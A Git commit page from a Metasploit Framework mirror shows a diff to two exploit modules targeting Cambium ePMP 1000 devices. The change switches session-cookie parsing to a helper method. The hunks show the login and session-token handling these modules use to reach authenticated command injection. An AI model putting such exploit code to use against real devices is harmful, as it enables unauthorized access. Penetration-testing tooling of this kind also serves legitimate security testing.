infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Get @jhart-r7's fixes for cookie tests

MS-2855/keylogger-mettle-extension
Tod Beardsley 2017-12-19 09:03:51 -06:00
parent 85350a9645 7b386ea2c8
commit 2fa1568151
No known key found for this signature in database
GPG Key ID: 08B5B91DC85943FE
2 changed files with 13 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

11
modules/exploits/linux/http/epmp1000_get_chart_cmd_shell.rb
View File

@ -127,15 +127,15 @@ class MetasploitModule < Msf::Exploit::Remote
} }
) )
cookies = res.get_cookies
good_response = ( good_response = (
res && res &&
res.code == 200 && res.code == 200 &&
res.headers.include?('Set-Cookie') && cookies.include?('sysauth')
res.headers['Set-Cookie'].include?('sysauth')
) )
if good_response if good_response
sysauth_value = res.headers['Set-Cookie'].match(/((.*)[$ ])/) sysauth_value = cookies.match(/((.*)[$ ])/)
cookie1 = "#{sysauth_value}" cookie1 = "#{sysauth_value}"
prevsessid = res.body.match(/((?:[a-z][a-z]*[0-9]+[a-z0-9]*))/) prevsessid = res.body.match(/((?:[a-z][a-z]*[0-9]+[a-z0-9]*))/)
@ -158,10 +158,11 @@ class MetasploitModule < Msf::Exploit::Remote
} }
) )
cookies = res.get_cookies
good_response = ( good_response = (
res && res &&
res.code == 200 && res.code == 200 &&
res.headers.include?('Set-Cookie') && !cookies.blank? &&
!res.body.include?('auth_failed') && !res.body.include?('auth_failed') &&
!res.body.include?('Maximum number of users reached.') !res.body.include?('Maximum number of users reached.')
) )
@ -170,7 +171,7 @@ class MetasploitModule < Msf::Exploit::Remote
print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}") print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
# get the cookie now # get the cookie now
sysauth_value_2 = res.headers['Set-Cookie'].match(/((.*)[$ ])/) sysauth_value_2 = cookies.match(/((.*)[$ ])/)
stok_value_2_dirty = res.body.match(/"stok": "(.*?)"/) stok_value_2_dirty = res.body.match(/"stok": "(.*?)"/)
stok_value_2 = "#{stok_value_2_dirty}".split('"')[3] stok_value_2 = "#{stok_value_2_dirty}".split('"')[3]
final_cookie = "#{sysauth_value_2}" + 'usernameType_80=admin; stok_80=' + "#{stok_value_2}" final_cookie = "#{sysauth_value_2}" + 'usernameType_80=admin; stok_80=' + "#{stok_value_2}"

14
modules/exploits/linux/http/epmp1000_ping_cmd_shell.rb
View File

@ -127,15 +127,15 @@ class MetasploitModule < Msf::Exploit::Remote
} }
) )
cookies = res.get_cookies
good_response = ( good_response = (
res && res &&
res.code == 200 && res.code == 200 &&
res.headers.include?('Set-Cookie') && cookies.include?('sysauth')
res.headers['Set-Cookie'].include?('sysauth')
) )
if good_response if good_response
sysauth_value = res.headers['Set-Cookie'].match(/((.*)[$ ])/) sysauth_value = cookies.match(/((.*)[$ ])/)
cookie1 = "#{sysauth_value}; " + "globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22#{user}%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D" cookie1 = "#{sysauth_value}; " + "globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22#{user}%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D"
@ -157,11 +157,11 @@ class MetasploitModule < Msf::Exploit::Remote
} }
) )
cookies = res.get_cookies
good_response = ( good_response = (
res && res &&
res.code == 200 && res.code == 200 &&
res.headers.include?('Set-Cookie') && cookies.include?('stok=') &&
res.headers['Set-Cookie'].include?('stok=') &&
!res.body.include?('Maximum number of users reached.') !res.body.include?('Maximum number of users reached.')
) )
@ -169,9 +169,9 @@ class MetasploitModule < Msf::Exploit::Remote
print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}") print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
# get the cookie now # get the cookie now
get_stok = res.headers['Set-Cookie'].match(/stok=(.*)/) get_stok = cookies.match(/stok=(.*)/)
stok_value = get_stok[1] stok_value = get_stok[1]
sysauth_value = res.headers['Set-Cookie'].match(/((.*)[$ ])/) sysauth_value = cookies.match(/((.*)[$ ])/)
final_cookie = "#{sysauth_value}; " + "globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22#{user}%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D; userType=Installer; usernameType=installer; stok=" + "#{stok_value}" final_cookie = "#{sysauth_value}; " + "globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22#{user}%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D; userType=Installer; usernameType=installer; stok=" + "#{stok_value}"
# create config_uri # create config_uri